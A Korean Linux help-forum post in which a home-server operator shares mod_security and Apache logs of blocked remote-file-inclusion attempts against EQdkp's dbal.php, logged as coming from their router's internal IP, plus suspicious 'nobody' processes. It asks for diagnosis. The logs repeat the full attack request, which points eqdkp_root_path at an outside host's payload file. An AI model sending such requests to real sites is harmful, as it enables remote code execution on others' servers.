질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

침입 시도한 IP가 공유기???

작성자 정보

  • 문경윤 작성
  • 작성일

컨텐츠 정보

본문

mod_security 웹방화벽을 가동하고 있습니다.
집에서 서버를 돌리고 있고요. 무료 호스팅을 하고 있습니다.
공유기에 물려 돌리고 있습니다. 공유기 주소는 192.168.0.254입니다.
갑자기 공유기에 심하게 렉이 걸리며 서버 뿐만 아니라 데스크탑까지 인터넷이 제대로 안 되
는 현상이 나타나서 서버 로그를 분석해 보았습니다.
예전에 크래킹을 당한 적이 있습니다. 같은 계정으로 계속 침입 시도가 들어오더군요.

 

 


우선 mod_security에 의해 필터링 정책에 걸린 침입 흔적 로그를 보여 드립니다.


[05/Feb/2008:11:31:58 +0900] [www.ktguild.net/sid#9874ab8][rid#997d368]
[/home/newdkp/eqdkp//includes/dbal.php][1] Access denied with code 403. Pattern
match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:31:59 +0900] [www.ktguild.net/sid#9874ab8][rid#9966310]
[//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:31:59 +0900] [www.ktguild.net/sid#9874ab8][rid#9966310]
[/home/newdkp//includes/dbal.php][1] Access denied with code 403. Pattern
match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:32:53 +0900] [www.wowvindicators.com/sid#9874ab8][rid#9966310]
[/eqdkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include"
at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:32:55 +0900] [www.wowvindicators.com/sid#9874ab8][rid#9966310]
[//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:36:48 +0900] [www.wowhost.dk/sid#9874ab8][rid#997f370]
[/oldtimers/dkp/plugins/raidplan//includes/dbal.php][1] Access denied with code 403.
Pattern match "/include" at THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]
[05/Feb/2008:11:43:45 +0900] [www.projmayhem.com/sid#9874ab8][rid#9971338]
[/dkp//includes/dbal.php][1] Access denied with code 403. Pattern match "/include" at
THE_REQUEST [msg "cracking attack9"] [severity "EMERGENCY"]

 

 

 

그 다음은 /usr/local/apache/logs/error_log 내용이고요.

 

[Tue Feb 05 11:22:41 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.seraphinguild.net"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:18 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.hgfollowers.com"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:28 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.hgfollowers.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:23:38 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.hgfollowers.com"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:06 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.fragfrogs.ca"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.fragfrogs.ca"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:27 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.fragfrogs.ca"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:24:38 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.destinyknights.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:22 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "destinyknights.com"] [uri "/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:32 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "destinyknights.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:25:33 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.seraphinguild.net"]
[uri "/core//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:28:20 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.hgfollowers.com"] [uri "/dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:58 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.ktguild.net"]
[uri "/home/newdkp/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:59 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.ktguild.net"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:31:59 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.ktguild.net"]
[uri "/home/newdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:32:53 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.wowvindicators.com"]
[uri "/eqdkp//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:32:55 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.wowvindicators.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:36:48 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.wowhost.dk"]
[uri "/oldtimers/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:43:45 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.projmayhem.com"] [uri "/dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:46:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "equitas-guild.info"] [uri "/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:46:23 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "equitas-guild.info"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:47:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.fragfrogs.ca"] [uri "/dkp2//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:12 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.ohayojapan.com"]
[uri "/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:13 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.ohayojapan.com"] [uri "//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]
[Tue Feb 05 11:48:17 2008] [error] [client 192.168.0.254] mod_security: Access denied
with code 403. Pattern match "/include" at THE_REQUEST [msg "cracking attack9"]
[severity "EMERGENCY"] [hostname "
www.ohayojapan.com"]
[uri "/dkp/plugins//includes/dbal.php?eqdkp_root_path=http://3sk3nt.kit.net/safe.txt?"]

 


 

마지막으로 /usr/local/apache/logs/access_log 내용입니다. 웹방화벽과 아파치 에러로그에 남은 침입 시도가 일어난 시간대와 동일한 시간대로 기록된 것들만 모아 봤습니다.

 

192.168.0.254 - - [05/Feb/2008:11:31:58
+0900] "GET /home/newdkp/eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 305 "-" "libwww-
perl/5.79"

192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET //includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 287 "-" "libwww-
perl/5.79"
192.168.0.254 - - [05/Feb/2008:11:31:59 +0900] "GET /home/newdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 299 "-" "libwww-
perl/5.79"
121.136.176.72 - - [05/Feb/2008:11:31:59
+0900] "GET /8th/images/98img/analysis_terry.gif HTTP/1.1" 200
5441 "
http://blog.naver.com/PostList.nhn?
blogId=fkdiidkrk&currentPage=103&categoryNo=30&viewdate=" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1)"

192.168.0.254 - - [05/Feb/2008:11:32:53 +0900] "GET /eqdkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 300 "-" "libwww-
perl/5.79"

61.35.195.4 - - [05/Feb/2008:11:32:55 +0900] "GET /frb.JPG HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_num.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/title_breaker.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_date.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_subject.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
192.168.0.254 - - [05/Feb/2008:11:32:55 +0900] "GET //includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 294 "-" "libwww-
perl/5.79"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/btn_list.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_vote.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_register.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/blank.gif%20width= HTTP/1.1" 404
325 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/images/item_view.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/t.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/search.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.35.195.4 - - [05/Feb/2008:11:32:55
+0900] "GET /CGI/zb41/skin/urban_black_forum/cancle.gif HTTP/1.1" 304 -
 "
http://mse9000.digimoon.net/CGI/zb41/zboard.php?
id=Kommunity_Freeboard&select_arrange=headnum&desc=asc&page_num=20&selected=&exec=&sn=o
ff&ss=on&sc=off&category=&keyword=%C4%DE%BA%B8" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; EmbeddedWB 14.52 from:
http://www.bsalsa.com/ EmbeddedWB
14.52; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

 

192.168.0.254 - - [05/Feb/2008:11:36:48
+0900] "GET /oldtimers/dkp/plugins/raidplan//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 317 "-" "libwww-
perl/5.79"


192.168.0.254 - - [05/Feb/2008:11:43:45 +0900] "GET /dkp//includes/dbal.php?
eqdkp_root_path=http://3sk3nt.kit.net/safe.txt? HTTP/1.1" 403 294 "-" "libwww-
perl/5.79"

 

 

 

 

ps -ef  명령어로 프로세스를 검사하면 아래와 같이 요상한 것들이 지금도 나오네요.

 

nobody    4914     1  0 10:39 ?        00:00:00 /^^/
nobody    5112     1  0 10:41 ?        00:00:01 /^^/
nobody    5114     1  0 10:41 ?        00:00:01 /^^/
nobody    5118     1  0 10:42 ?        00:00:01 /^^/
nobody    5120     1  0 10:42 ?        00:00:10 /^^/

 

 

 

top 명령어로 서버 부하량을 살펴봐도 별 이상은 없습니다. 다만 좀비 프로세스가 3개에서 4개로 왔다갔다 합니다.

 

 14:18,  2 users,  load average: 0.07, 0.11, 0.13
Tasks: 117 total,   1 running, 112 sleeping,   1 stopped,   3 zombie
Cpu(s):  0.0% us,  0.3% sy,  0.0% ni, 99.0% id,  0.7% wa,  0.0% hi,  0.0% si
Mem:    514736k total,   438260k used,    76476k free,    21104k buffers
Swap:  1052248k total,     3692k used,  1048556k free,   247484k cached

 

 


access_log 파일을 보시면 알겠지만 공유기 주소로 침입 시도가 들어온 걸로 기록이 남네요.
여태 크래킹을 당했을 땐 외부 아이피로만 잡혀 나오던데 오늘 이런 기록은 첨 보는군요. 공
유기 내부 주소로 잡히는 겁니다.
이건 어떤 성격의 침입으로 봐야 될런지요?

아이피를 차단하든가 해야 되는데 공유기로 잡혀 나오니 이거 난감하네요.

관련자료

댓글 0
등록된 댓글이 없습니다.

공지사항


뉴스광장


  • 현재 회원수 :  60,034 명
  • 현재 강좌수 :  35,783 개
  • 현재 접속자 :  265 명